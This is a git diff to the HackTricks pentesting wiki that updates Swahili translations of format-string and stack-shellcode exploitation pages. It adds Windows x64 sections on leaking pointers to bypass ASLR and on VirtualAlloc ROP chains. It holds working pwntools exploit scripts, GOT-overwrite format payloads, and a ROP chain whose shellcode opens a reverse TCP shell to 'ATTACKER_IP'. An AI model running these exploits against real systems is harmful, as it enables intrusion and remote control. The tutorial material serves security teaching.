diff --git a/src/SUMMARY.md b/src/SUMMARY.md index ccaa8f2fe..e181a795f 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -234,6 +234,7 @@ - [Authentication Credentials Uac And Efs](windows-hardening/authentication-credentials-uac-and-efs.md) - [Checklist - Local Windows Privilege Escalation](windows-hardening/checklist-windows-privilege-escalation.md) - [Windows Local Privilege Escalation](windows-hardening/windows-local-privilege-escalation/README.md) + - [Arbitrary Kernel Rw Token Theft](windows-hardening/windows-local-privilege-escalation/arbitrary-kernel-rw-token-theft.md) - [Dll Hijacking](windows-hardening/windows-local-privilege-escalation/dll-hijacking.md) - [Abusing Tokens](windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md) - [Access Tokens](windows-hardening/windows-local-privilege-escalation/access-tokens.md) diff --git a/src/binary-exploitation/format-strings/README.md b/src/binary-exploitation/format-strings/README.md index 38fa792fe..d4e663919 100644 --- a/src/binary-exploitation/format-strings/README.md +++ b/src/binary-exploitation/format-strings/README.md @@ -3,15 +3,15 @@ {{#include ../../banners/hacktricks-training.md}} -## Basic Information +## Taarifa za Msingi -Katika C **`printf`** ni kazi inayoweza kutumika **kuchapisha** maandiko fulani. **Parameta ya kwanza** ambayo kazi hii inatarajia ni **maandishi halisi yenye waandishi wa muundo**. **Parameta zinazofuata** zinazotarajiwa ni **thamani** za **kuchukua nafasi** za **waandishi** kutoka kwa maandiko halisi. +Katika C **`printf`** ni funsi inayoweza kutumika **kuchapisha** kamba ya herufi. Parameta ya kwanza ambayo funsi hii inatarajia ni maandishi ghafi yenye **vibadilishi vya muundo**. Parameta zinazofuata ni thamani zitakazobadilisha **vibadilishi vya muundo** katika maandishi ghafi. -Kazi nyingine zenye udhaifu ni **`sprintf()`** na **`fprintf()`**. +Funsi nyingine zilizo na udhaifu ni **`sprintf()`** na **`fprintf()`**. -Udhaifu huu unatokea wakati **maandishi ya mshambuliaji yanapotumika kama hoja ya kwanza** kwa kazi hii. Mshambuliaji ataweza kuunda **ingizo maalum linalotumia** uwezo wa **printf format** kusoma na **kuandika data yoyote katika anwani yoyote (inasomeka/inayoweza kuandikwa)**. Kwa njia hii, kuwa na uwezo wa **kutekeleza msimbo wowote**. +Udhaifu hujitokeza wakati maandishi ya mshambuliaji yanapotumika kama hoja ya kwanza kwa funsi hii. Mshambuliaji ataweza kutengeneza ingizo maalum akitumia vibaya uwezo wa printf format string kusoma na kuandika data yoyote kwenye anwani yoyote (readable/writable). Kwa njia hii atakuwa na uwezo wa execute arbitrary code. -#### Formatters: +#### Vibadilishi: ```bash %08x —> 8 hex bytes %d —> Entire @@ -22,9 +22,9 @@ Udhaifu huu unatokea wakati **maandishi ya mshambuliaji yanapotumika kama hoja y %hn —> Occupies 2 bytes instead of 4 $X —> Direct access, Example: ("%3$d", var1, var2, var3) —> Access to var3 ``` -**Mifano:** +**Mifano:** -- Mfano unaoweza kuathiriwa: +- Mfano dhaifu: ```c char buffer[30]; gets(buffer); // Dangerous: takes user input without restrictions. @@ -35,11 +35,11 @@ printf(buffer); // If buffer contains "%x", it reads from the stack. int value = 1205; printf("%x %x %x", value, value, value); // Outputs: 4b5 4b5 4b5 ``` -- Pamoja na Hoja Zilizokosekana: +- Kwa Vigezo Vilivyokosekana: ```c printf("%x %x %x", value); // Unexpected output: reads random values from the stack. ``` -- fprintf inayoathiri: +- fprintf dhaifu: ```c #include @@ -52,28 +52,28 @@ fclose(output_file); return 0; } ``` -### **Kupata Viashiria** +### **Kupata Pointers** -Muundo **`%$x`**, ambapo `n` ni nambari, unaruhusu kuashiria kwa printf kuchagua parameter ya n (kutoka kwenye stack). Hivyo ikiwa unataka kusoma parameter ya 4 kutoka kwenye stack ukitumia printf unaweza kufanya: +Muundo **`%$x`**, ambapo `n` ni nambari, unaruhusu kuagiza printf ichague kigezo cha n (kutoka kwenye stack). Kwa hivyo, ikiwa unataka kusoma kigezo cha nne kutoka kwenye stack ukitumia printf unaweza kufanya: ```c printf("%x %x %x %x") ``` -na ungeweza kusoma kutoka kwa param ya kwanza hadi ya nne. +na ungeweza kusoma kutoka param ya kwanza hadi param ya nne. Au unaweza kufanya: ```c printf("%4$x") ``` -na kusoma moja kwa moja ya nne. +na soma moja kwa moja ya nne. -Kumbuka kwamba mshambuliaji anadhibiti `printf` **parameta, ambayo kimsingi inamaanisha kwamba** ingizo lake litakuwa kwenye stack wakati `printf` inaitwa, ambayo inamaanisha kwamba anaweza kuandika anwani maalum za kumbukumbu kwenye stack. +Kumbuka kwamba mshambuliaji anadhibiti `printf` **parameter, ambayo kwa msingi wake inamaanisha kwamba** ingizo lake litawekwa kwenye stack wakati `printf` itakapoitwa, ambayo inamaanisha anaweza kuandika specific memory addresses kwenye stack. > [!CAUTION] -> Mshambuliaji anayekontrol ingizo hili, ataweza **kuongeza anwani zisizo na mipaka kwenye stack na kufanya `printf` izifikie**. Katika sehemu inayofuata itafafanuliwa jinsi ya kutumia tabia hii. +> Mshambuliaji anayeudhibiti ingizo hili ataweza **add arbitrary address in the stack and make `printf` access them**. Katika sehemu inayofuata itafafanuliwa jinsi ya kutumia tabia hii. -## **Kusoma Bila Mpangilio** +## **Arbitrary Read** -Inawezekana kutumia formatter **`%n$s`** kufanya **`printf`** ipate **anwani** iliyoko katika **n nafasi**, ikifuatia na **kuichapisha kana kwamba ni string** (chapisha hadi 0x00 ipatikane). Hivyo ikiwa anwani ya msingi ya binary ni **`0x8048000`**, na tunajua kwamba ingizo la mtumiaji linaanza katika nafasi ya 4 kwenye stack, inawezekana kuchapisha mwanzo wa binary kwa: +Inawezekana kutumia formatter **`%n$s`** kufanya **`printf`** ichukue **address** iliyoko kwenye **n position**, kufuatilia na **kuiprint kama ingekuwa string** (kuprint hadi 0x00 inapopatikana). Kwa hiyo ikiwa base address ya binary ni **`0x8048000`**, na tunajua kwamba user input inaanza kwenye 4th position kwenye stack, inawezekana kuprint mwanzo wa binary kwa: ```python from pwn import * @@ -87,11 +87,11 @@ p.sendline(payload) log.info(p.clean()) # b'\x7fELF\x01\x01\x01||||' ``` > [!CAUTION] -> Kumbuka kwamba huwezi kuweka anwani 0x8048000 mwanzoni mwa ingizo kwa sababu mfuatano utawekwa 0x00 mwishoni mwa anwani hiyo. +> Kumbuka huwezi kuweka anwani 0x8048000 mwanzoni mwa input kwa sababu string itakuwa cat katika 0x00 mwishoni mwa anwani hiyo. ### Tafuta offset -Ili kupata offset kwa ingizo lako unaweza kutuma bytes 4 au 8 (`0x41414141`) ikifuatiwa na **`%1$x`** na **kuongeza** thamani hadi upate `A's`. +Ili kupata offset kwa input yako, unaweza kutuma 4 au 8 bytes (`0x41414141`) ikifuatiwa na **`%1$x`** na **ongeza** thamani hadi utakapopata `A's`.
@@ -126,39 +126,40 @@ p.close() ```
-### Jinsi inavyofaa +### Ni muhimu vipi -Kusoma kwa bahati kunaweza kuwa na manufaa kwa: +Arbitrary reads zinaweza kuwa muhimu kwa: -- **Kutoa** **binary** kutoka kwenye kumbukumbu -- **Kufikia sehemu maalum za kumbukumbu ambapo** **info** **nyeti** imehifadhiwa (kama vile canaries, funguo za usimbuaji au nywila za kawaida kama katika hii [**CTF challenge**](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak#read-arbitrary-value)) +- **Dump** the **binary** from memory +- **Access specific parts of memory where sensitive** **info** is stored (like canaries, encryption keys or custom passwords like in this [**CTF challenge**](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak#read-arbitrary-value)) -## **Kuandika kwa Bahati** +## **Arbitrary Write** -Formatter **`%$n`** **inaandika** **idadi ya bytes zilizandika** katika **anwani iliyoonyeshwa** katika param ya \ kwenye stack. Ikiwa mshambuliaji anaweza kuandika herufi nyingi kadri atakavyo kwa printf, atakuwa na uwezo wa kufanya **`%$n`** kuandika nambari isiyo ya kawaida katika anwani isiyo ya kawaida. +The formatter **`%$n`** **writes** the **number of written bytes** in the **indicated address** in the param in the stack. Ikiwa mshambuliaji anaweza kuandika herufi kwa wingi anayetaka kwa kutumia printf, ataweza kumfanya **`%$n`** iandike namba yoyote katika anuani yoyote. -Kwa bahati, ili kuandika nambari 9999, si lazima kuongeza 9999 "A"s kwenye ingizo, ili kufanya hivyo inawezekana kutumia formatter **`%.%$n`** kuandika nambari **``** katika **anwani inayotolewa na nafasi ya `num`**. +Kwa bahati nzuri, ili kuandika namba 9999, haitohitaji kuongeza "A" 9999 kwenye input; badala yake inawezekana kutumia formatter **`%.%$n`** kuandika namba **``** katika **anuani inayonyoshwa na nafasi ya `num`**. ```bash AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param AAAA.%500\$08x —> Param at offset 500 ``` -Hata hivyo, kumbuka kwamba kawaida ili kuandika anwani kama `0x08049724` (ambayo ni nambari KUBWA kuandika mara moja), **inatumika `$hn`** badala ya `$n`. Hii inaruhusu **kuandika tu Bytes 2**. Kwa hivyo operesheni hii inafanywa mara mbili, moja kwa ajili ya Bytes 2 za juu za anwani na nyingine kwa ajili ya zile za chini. +Hata hivyo, kumbuka kwamba kawaida ili kuandika anwani kama `0x08049724` (ambayo ni Nambari KUBWA kuandika kwa mara moja), **inatumika `$hn`** badala ya `$n`. Hii inawezesha **kuandika tu 2 Bytes**. Kwa hiyo operesheni hii hufanywa mara mbili, moja kwa 2B za juu za anwani na tena kwa zile za chini. -Kwa hivyo, udhaifu huu unaruhusu **kuandika chochote katika anwani yoyote (kuandika bila mpangilio).** +Kwa hivyo, uharibifu huu unawezesha **kuandika kitu chochote katika anwani yoyote (arbitrary write).** + +Katika mfano huu, lengo litakuwa **kuandika upya** **anwani** ya **function** katika jedwali la **GOT** ambayo itaitwa baadaye. Ingawa hii inaweza kutumia mbinu nyingine za arbitrary write to exec: -Katika mfano huu, lengo litakuwa **kuandika upya** **anwani** ya **kazi** katika jedwali la **GOT** ambalo litaitwa baadaye. Ingawa hii inaweza kutumia mbinu nyingine za kuandika bila mpangilio ili kutekeleza: {{#ref}} ../arbitrary-write-2-exec/ {{#endref}} -Tuta **andika upya** **kazi** ambayo **inapokea** **hoja** zake kutoka kwa **mtumiaji** na **kuielekeza** kwa **`system`** **kazi**.\ -Kama ilivyotajwa, kuandika anwani, kawaida hatua 2 zinahitajika: Kwanza **unaandika Bytes 2** za anwani na kisha zile nyingine 2. Ili kufanya hivyo **`$hn`** inatumika. +Tutafanya **kuandika upya** **function** ambayo **inapokea** hoja zake kutoka kwa mtumiaji na kuielekeza kwa **`system`** **function**.\ +Kama ilivyotajwa, kuandika anwani kawaida kunahitaji hatua 2: Kwanza unaandika **2Bytes** za anwani kisha zile nyingine 2. Kufanya hivyo **`$hn`** inatumika. -- **HOB** inaitwa kwa Bytes 2 za juu za anwani -- **LOB** inaitwa kwa Bytes 2 za chini za anwani +- **HOB** inarejelewa kwa 2 bytes za juu za anwani +- **LOB** inarejelewa kwa 2 bytes za chini za anwani -Kisha, kwa sababu ya jinsi format string inavyofanya kazi unahitaji **kuandika kwanza ndogo** ya \[HOB, LOB] na kisha nyingine. +Kisha, kutokana na jinsi format string inavyofanya kazi lazima **uandike kwanza ndogo zaidi** ya [HOB, LOB] kisha nyingine. Ikiwa HOB < LOB\ `[address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]` @@ -170,16 +171,16 @@ HOB LOB HOB_shellcode-8 NºParam_dir_HOB LOB_shell-HOB_shell NºParam_dir_LOB ```bash python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"' ``` -### Pwntools Template +### Pwntools Kiolezo -You can find a **template** to prepare a exploit for this kind of vulnerability in: +Unaweza kupata **kiolezo** cha kuandaa exploit kwa aina hii ya udhaifu katika: {{#ref}} format-strings-template.md {{#endref}} -Or this basic example from [**here**](https://ir0nstone.gitbook.io/notes/types/stack/got-overwrite/exploiting-a-got-overwrite): +Au mfano huu wa msingi kutoka [**here**](https://ir0nstone.gitbook.io/notes/types/stack/got-overwrite/exploiting-a-got-overwrite): ```python from pwn import * @@ -200,18 +201,58 @@ p.interactive() ``` ## Format Strings to BOF -Inawezekana kutumia vitendo vya kuandika vya udhaifu wa format string ili **kuandika katika anwani za stack** na kutumia udhaifu wa aina ya **buffer overflow**. +Ni uwezekano kutumia vibaya vitendo vya kuandika vya format string vulnerability ili **kuandika kwenye anwani za stack** na kushambulia aina ya **buffer overflow**. -## Mifano Mingine & Marejeleo +## Windows x64: Format-string leak to bypass ASLR (no varargs) + +On Windows x64 vigezo vinne vya kwanza vya integer/pointer hupitishwa kwa registers: RCX, RDX, R8, R9. Katika call-sites nyingi zenye mdudu, attacker-controlled string hutumiwa kama format argument lakini hakuna variadic arguments zinazotolewa, kwa mfano: +```c +// keyData is fully controlled by the client +// _snprintf(dst, len, fmt, ...) +_snprintf(keyStringBuffer, 0xff2, (char*)keyData); +``` +Kwa sababu hakuna varargs zinazopelekwa, any conversion like "%p", "%x", "%s" itasababisha CRT kusoma the next variadic argument kutoka kwa rejista inayofaa. With the Microsoft x64 calling convention the first such read for "%p" comes from R9. Whatever transient value is in R9 at the call-site will be printed. In practice this often leaks a stable in-module pointer (e.g., a pointer to a local/global object previously placed in R9 by surrounding code or a callee-saved value), which can be used to recover the module base and defeat ASLR. + +Practical workflow: + +- Inject a harmless format such as "%p " at the very start of the attacker-controlled string so the first conversion executes before any filtering. +- Capture the leaked pointer, identify the static offset of that object inside the module (by reversing once with symbols or a local copy), and recover the image base as `leak - known_offset`. +- Reuse that base to compute absolute addresses for ROP gadgets and IAT entries remotely. + +Example (abbreviated python): +```python +from pwn import remote + +# Send an input that the vulnerable code will pass as the "format" +fmt = b"%p " + b"-AAAAA-BBB-CCCC-0252-" # leading %p leaks R9 +io = remote(HOST, 4141) +# ... drive protocol to reach the vulnerable snprintf ... +leaked = int(io.recvline().split()[2], 16) # e.g. 0x7ff6693d0660 +base = leaked - 0x20660 # module base = leak - offset +print(hex(leaked), hex(base)) +``` +Vidokezo: +- Offset kamili ya kutoa hupatikana mara moja wakati wa local reversing kisha kutumika tena (same binary/version). +- Ikiwa "%p" haitachapisha pointer halali katika jaribio la kwanza, jaribu specifiers nyingine ("%llx", "%s") au conversions nyingi ("%p %p %p") ili kusampuli registers/stack za argument nyingine. +- Mfano huu ni maalum kwa Windows x64 calling convention na implementations za printf-family ambazo hunyakua varargs zisizo zipo kutoka registers wakati format string inazoziomba. + +Mbinu hii ni muhimu sana kuanzisha ROP kwenye Windows services zilizotengenezwa kwa ASLR na bila primitives wazi za memory disclosure. + +## Mifano Nyingine & Marejeo - [https://ir0nstone.gitbook.io/notes/types/stack/format-string](https://ir0nstone.gitbook.io/notes/types/stack/format-string) - [https://www.youtube.com/watch?v=t1LH9D5cuK4](https://www.youtube.com/watch?v=t1LH9D5cuK4) - [https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak) - [https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html](https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html) -- 32 bit, hakuna relro, hakuna canary, nx, hakuna pie, matumizi ya msingi ya format strings kuvuja bendera kutoka kwenye stack (hakuna haja ya kubadilisha mtiririko wa utekelezaji) +- 32 bit, no relro, no canary, nx, no pie, matumizi ya msingi ya format strings ku-leak flag kutoka stack (hakuna haja ya kubadilisha mtiririko wa utekelezaji) - [https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html](https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html) -- 32 bit, relro, hakuna canary, nx, hakuna pie, format string kuandika anwani `fflush` na kazi ya win (ret2win) +- 32 bit, relro, no canary, nx, no pie, format string ili ku-overwrite address ya `fflush` na win function (ret2win) - [https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html](https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html) -- 32 bit, relro, hakuna canary, nx, hakuna pie, format string kuandika anwani ndani ya main katika `.fini_array` (ili mtiririko urudi nyuma mara moja zaidi) na kuandika anwani kwa `system` katika jedwali la GOT ikielekeza kwa `strlen`. Wakati mtiririko unaporudi kwenye main, `strlen` inatekelezwa kwa pembejeo ya mtumiaji na ikielekeza kwa `system`, itatekeleza amri zilizopitishwa. +- 32 bit, relro, no canary, nx, no pie, format string ya kuandika address ndani ya main katika `.fini_array` (kwa hivyo flow inarudi tena mara 1) na kuandika address ya `system` kwenye GOT table ikielekeza kwa `strlen`. Wakati flow inaporudi main, `strlen` itatekelezwa na user input na ikiwa inamaanisha `system`, itatekeleza amri zilizopitishwa. + +## Marejeo + +- [HTB Reaper: Format-string leak + stack BOF → VirtualAlloc ROP (RCE)](https://0xdf.gitlab.io/2025/08/26/htb-reaper.html) +- [x64 calling convention (MSVC)](https://learn.microsoft.com/en-us/cpp/build/x64-calling-convention) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/stack-overflow/stack-shellcode/README.md b/src/binary-exploitation/stack-overflow/stack-shellcode/README.md index eeaf9c598..782ca077f 100644 --- a/src/binary-exploitation/stack-overflow/stack-shellcode/README.md +++ b/src/binary-exploitation/stack-overflow/stack-shellcode/README.md @@ -2,13 +2,13 @@ {{#include ../../../banners/hacktricks-training.md}} -## Basic Information +## Taarifa za Msingi -**Stack shellcode** ni mbinu inayotumika katika **binary exploitation** ambapo mshambuliaji anaandika shellcode kwenye stack ya programu iliyo hatarini na kisha kubadilisha **Instruction Pointer (IP)** au **Extended Instruction Pointer (EIP)** ili kuelekeza kwenye eneo la shellcode hii, na kusababisha itekelezwe. Hii ni mbinu ya jadi inayotumika kupata ufikiaji usioidhinishwa au kutekeleza amri zisizo na mipaka kwenye mfumo wa lengo. Hapa kuna muhtasari wa mchakato, ikiwa ni pamoja na mfano rahisi wa C na jinsi unavyoweza kuandika exploit inayolingana kwa kutumia Python na **pwntools**. +**Stack shellcode** ni mbinu inayotumika katika **binary exploitation** ambapo mshambuliaji anaandika shellcode kwenye stack ya programu dhaifu na kisha hubadilisha **Instruction Pointer (IP)** au **Extended Instruction Pointer (EIP)** ili kuielekeza kwenye eneo la shellcode hiyo, na kusababisha itekelezwe. Hii ni njia ya klasik inayotumika kupata ufikiaji usioidhinishwa au kutekeleza amri za hiari kwenye mfumo wa lengo. Hapa kuna uchanganuzi wa mchakato, ikiwa ni pamoja na mfano rahisi wa C na jinsi unavyoweza kuandika exploit inayoendana ukitumia Python na **pwntools**. -### C Example: A Vulnerable Program +### Mfano wa C: Programu dhaifu -Let's start with a simple example of a vulnerable C program: +Tuanze na mfano rahisi wa programu dhaifu ya C: ```c #include #include @@ -24,22 +24,22 @@ printf("Returned safely\n"); return 0; } ``` -Programu hii ina udhaifu wa buffer overflow kutokana na matumizi ya kazi ya `gets()`. +Programu hii iko hatarini kwa buffer overflow kutokana na matumizi ya `gets()` function. -### Uundaji +### Kujenga -Ili kuunda programu hii huku ukizima ulinzi mbalimbali (ili kuiga mazingira yenye udhaifu), unaweza kutumia amri ifuatayo: +Ili kujenga programu hii huku ukizima ulinzi mbalimbali (to simulate a vulnerable environment), unaweza kutumia amri ifuatayo: ```sh gcc -m32 -fno-stack-protector -z execstack -no-pie -o vulnerable vulnerable.c ``` -- `-fno-stack-protector`: Inazima ulinzi wa stack. -- `-z execstack`: Inafanya stack kuwa executable, ambayo ni muhimu kwa kutekeleza shellcode iliyohifadhiwa kwenye stack. -- `-no-pie`: Inazima Position Independent Executable, ikifanya iwe rahisi kutabiri anwani ya kumbukumbu ambapo shellcode yetu itakuwa. -- `-m32`: Inakusanya programu kama executable ya 32-bit, mara nyingi hutumiwa kwa urahisi katika maendeleo ya exploit. +- `-fno-stack-protector`: Inazima stack protection. +- `-z execstack`: Hufanya stack executable, jambo linalohitajika kwa kutekeleza shellcode iliyohifadhiwa kwenye stack. +- `-no-pie`: Inazima Position Independent Executable, na hivyo kurahisisha kutabiri memory address ambapo shellcode yetu itakuwa. +- `-m32`: Hucompile programu kama 32-bit executable, mara nyingi kutumika kwa urahisi katika exploit development. ### Python Exploit using Pwntools -Here's how you could write an exploit in Python using **pwntools** to perform a **ret2shellcode** attack: +Hapa kuna jinsi unavyoweza kuandika exploit kwa Python ukitumia **pwntools** ili kufanya shambulio la **ret2shellcode**: ```python from pwn import * @@ -66,26 +66,97 @@ payload += p32(0xffffcfb4) # Supossing 0xffffcfb4 will be inside NOP slide p.sendline(payload) p.interactive() ``` -Hii script inajenga payload inayojumuisha **NOP slide**, **shellcode**, na kisha inabadilisha **EIP** kwa anwani inayotaja NOP slide, kuhakikisha shellcode inatekelezwa. +This script constructs a payload consisting of a **NOP slide**, the **shellcode**, and then overwrites the **EIP** with the address pointing to the NOP slide, ensuring the shellcode gets executed. -**NOP slide** (`asm('nop')`) inatumika kuongeza nafasi kwamba utekelezaji uta "slide" ndani ya shellcode yetu bila kujali anwani halisi. Badilisha hoja ya `p32()` kwa anwani ya mwanzo ya buffer yako pamoja na offset ili kuangukia kwenye NOP slide. +The **NOP slide** (`asm('nop')`) is used to increase the chance that execution will "slide" into our shellcode regardless of the exact address. Adjust the `p32()` argument to the starting address of your buffer plus an offset to land in the NOP slide. -## Ulinzi +## Windows x64: Bypass NX with VirtualAlloc ROP (ret2stack shellcode) -- [**ASLR**](../../common-binary-protections-and-bypasses/aslr/index.html) **inapaswa kuzuiliwa** ili anwani iwe ya kuaminika katika utekelezaji tofauti au anwani ambapo kazi itahifadhiwa haitakuwa sawa kila wakati na unahitaji kuwa na leak ili kubaini wapi kazi ya win imepakiwa. -- [**Stack Canaries**](../../common-binary-protections-and-bypasses/stack-canaries/index.html) pia inapaswa kuzuiliwa au anwani ya kurudi ya EIP iliyovunjika haitafuatiwa kamwe. -- [**NX**](../../common-binary-protections-and-bypasses/no-exec-nx.md) **stack** ulinzi utazuia utekelezaji wa shellcode ndani ya stack kwa sababu eneo hilo halitakuwa la kutekelezeka. +Kwenye Windows za kisasa stack sio executable (DEP/NX). Njia ya kawaida ya bado kuendesha stack-resident shellcode baada ya stack BOF ni kujenga mnyororo wa 64-bit ROP unaoitisha VirtualAlloc (au VirtualProtect) kutoka kwa module Import Address Table (IAT) ili kufanya eneo la stack liwe executable kisha kurudi katika shellcode iliyounganishwa baada ya mnyororo. -## Mifano Mingine & Marejeleo +Key points (Win64 calling convention): +- VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect) +- RCX = lpAddress → chagua anwani kwenye stack ya sasa (e.g., RSP) ili eneo jipya lililotengwa la RWX ligongane na payload yako +- RDX = dwSize → kubwa vya kutosha kwa chain yako + shellcode (e.g., 0x1000) +- R8 = flAllocationType = MEM_COMMIT (0x1000) +- R9 = flProtect = PAGE_EXECUTE_READWRITE (0x40) +- Return directly into the shellcode placed right after the chain. + +Minimal strategy: +1) Leak a module base (e.g., via a format-string, object pointer, etc.) to compute absolute gadget and IAT addresses under ASLR. +2) Find gadgets to load RCX/RDX/R8/R9 (pop or mov/xor-based sequences) and a call/jmp [VirtualAlloc@IAT]. If you lack direct pop r8/r9, use arithmetic gadgets to synthesize constants (e.g., set r8=0 and repeatedly add r9=0x40 forty times to reach 0x1000). +3) Place stage-2 shellcode immediately after the chain. + +Example layout (conceptual): +``` +# ... padding up to saved RIP ... +# R9 = 0x40 (PAGE_EXECUTE_READWRITE) +POP_R9_RET; 0x40 +# R8 = 0x1000 (MEM_COMMIT) — if no POP R8, derive via arithmetic +POP_R8_RET; 0x1000 +# RCX = &stack (lpAddress) +LEA_RCX_RSP_RET # or sequence: load RSP into a GPR then mov rcx, reg +# RDX = size (dwSize) +POP_RDX_RET; 0x1000 +# Call VirtualAlloc via the IAT +[IAT_VirtualAlloc] +# New RWX memory at RCX — execution continues at the next stack qword +JMP_SHELLCODE_OR_RET +# ---- stage-2 shellcode (x64) ---- +``` +Kwa seti ya gadgets iliyo na vikwazo, unaweza kutengeneza thamani za rejista kwa njia isiyo ya moja kwa moja, kwa mfano: +- mov r9, rbx; mov r8, 0; add rsp, 8; ret → iweke r9 kutoka rbx, ifanye r8 kuwa sifuri, na fidia stack kwa qword ya takataka. +- xor rbx, rsp; ret → weka rbx kuwa pointer ya stack ya sasa. +- push rbx; pop rax; mov rcx, rax; ret → hamisha thamani iliyotokana na RSP ndani ya RCX. + +Pwntools sketch (ikiwa base na gadgets vinajulikana): +```python +from pwn import * +base = 0x7ff6693b0000 +IAT_VirtualAlloc = base + 0x400000 # example: resolve via reversing +rop = b'' +# r9 = 0x40 +rop += p64(base+POP_RBX_RET) + p64(0x40) +rop += p64(base+MOV_R9_RBX_ZERO_R8_ADD_RSP_8_RET) + b'JUNKJUNK' +# rcx = rsp +rop += p64(base+POP_RBX_RET) + p64(0) +rop += p64(base+XOR_RBX_RSP_RET) +rop += p64(base+PUSH_RBX_POP_RAX_RET) +rop += p64(base+MOV_RCX_RAX_RET) +# r8 = 0x1000 via arithmetic if no pop r8 +for _ in range(0x1000//0x40): +rop += p64(base+ADD_R8_R9_ADD_RAX_R8_RET) +# rdx = 0x1000 (use any available gadget) +rop += p64(base+POP_RDX_RET) + p64(0x1000) +# call VirtualAlloc and land in shellcode +rop += p64(IAT_VirtualAlloc) +rop += asm(shellcraft.amd64.windows.reverse_tcp("ATTACKER_IP", ATTACKER_PORT)) +``` +Tips: +- VirtualProtect hufanya kazi kwa njia sawa ikiwa kufanya buffer iliyopo kuwa RX ni kipaumbele; mpangilio wa vigezo ni tofauti. +- Ikiwa nafasi ya stack ni nyembamba, tenga RWX mahali pengine (RCX=NULL) na jmp kwenye eneo jipya badala ya kutumia tena stack. +- Daima zingatia gadgets zinazorudisha RSP (e.g., add rsp, 8; ret) kwa kuingiza junk qwords. + +- [**ASLR**](../../common-binary-protections-and-bypasses/aslr/index.html) **inapaswa kuzimwa** ili anwani iwe ya kuaminika kwa utekelezaji tofauti; vinginevyo anwani ambapo function itahifadhiwa haitakuwa ile ile kila wakati na utahitaji leak ili kugundua wapi win function imepakiwa. +- [**Stack Canaries**](../../common-binary-protections-and-bypasses/stack-canaries/index.html) **inapaswa pia kuzimwa** au anwani ya kurudi ya EIP itakayodhulumiwa haitawahi kutumika. +- [**NX**](../../common-binary-protections-and-bypasses/no-exec-nx.md) **stack** ulinzi utaizuia utekelezaji wa shellcode ndani ya stack kwa sababu eneo hilo halitaweza kutekelezwa. + +## Mifano na Marejeo - [https://ir0nstone.gitbook.io/notes/types/stack/shellcode](https://ir0nstone.gitbook.io/notes/types/stack/shellcode) - [https://guyinatuxedo.github.io/06-bof_shellcode/csaw17_pilot/index.html](https://guyinatuxedo.github.io/06-bof_shellcode/csaw17_pilot/index.html) -- 64bit, ASLR na leak ya anwani ya stack, andika shellcode na ruka kwake +- 64bit, ASLR na stack address leak, andika shellcode na ruka kwenye hiyo - [https://guyinatuxedo.github.io/06-bof_shellcode/tamu19_pwn3/index.html](https://guyinatuxedo.github.io/06-bof_shellcode/tamu19_pwn3/index.html) -- 32 bit, ASLR na leak ya stack, andika shellcode na ruka kwake +- 32 bit, ASLR na stack leak, andika shellcode na ruka kwenye hiyo - [https://guyinatuxedo.github.io/06-bof_shellcode/tu18_shellaeasy/index.html](https://guyinatuxedo.github.io/06-bof_shellcode/tu18_shellaeasy/index.html) -- 32 bit, ASLR na leak ya stack, kulinganisha kuzuia wito wa exit(), badilisha variable kwa thamani na andika shellcode na ruka kwake +- 32 bit, ASLR na stack leak, kulinganisha ili kuzuia wito la exit(), funika variable na thamani, andika shellcode na ruka kwenye hiyo - [https://8ksec.io/arm64-reversing-and-exploitation-part-4-using-mprotect-to-bypass-nx-protection-8ksec-blogs/](https://8ksec.io/arm64-reversing-and-exploitation-part-4-using-mprotect-to-bypass-nx-protection-8ksec-blogs/) -- arm64, hakuna ASLR, ROP gadget kufanya stack iwe ya kutekelezeka na ruka kwa shellcode ndani ya stack +- arm64, hakuna ASLR, ROP gadget kufanya stack iwe executable na ruka kwa shellcode iliyoko kwenye stack + + +## Marejeo + +- [HTB Reaper: Format-string leak + stack BOF → VirtualAlloc ROP (RCE)](https://0xdf.gitlab.io/2025/08/26/htb-reaper.html) +- [VirtualAlloc documentation](https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualalloc) {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/windows-hardening/windows-local-privilege-escalation/README.md b/src/windows-hardening/windows-local-privilege-escalation/README.md index a1a8db472..1bde7449f 100644 --- a/src/windows-hardening/windows-local-privilege-escalation/README.md +++ b/src/windows-hardening/windows-local-privilege-escalation/README.md @@ -2,13 +2,13 @@ {{#include ../../banners/hacktricks-training.md}} -### **Best tool to look for Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS) +### **Chombo bora cha kutafuta Windows local privilege escalation vectors:** [**WinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS) -## Initial Windows Theory +## Nadharia ya Mwanzo ya Windows ### Access Tokens -**Ikiwa hujui ni nini Windows Access Tokens, soma ukurasa ufuatao kabla ya kuendelea:** +**Kama haufahamu Windows Access Tokens, soma ukurasa ufuatao kabla ya kuendelea:** {{#ref}} @@ -17,7 +17,7 @@ access-tokens.md ### ACLs - DACLs/SACLs/ACEs -**Angalia ukurasa ufuatao kwa maelezo zaidi kuhusu ACLs - DACLs/SACLs/ACEs:** +**Tazama ukurasa ufuatao kwa taarifa zaidi kuhusu ACLs - DACLs/SACLs/ACEs:** {{#ref}} @@ -26,27 +26,27 @@ acls-dacls-sacls-aces.md ### Integrity Levels -**Ikiwa hujui ni nini viwango vya uaminifu katika 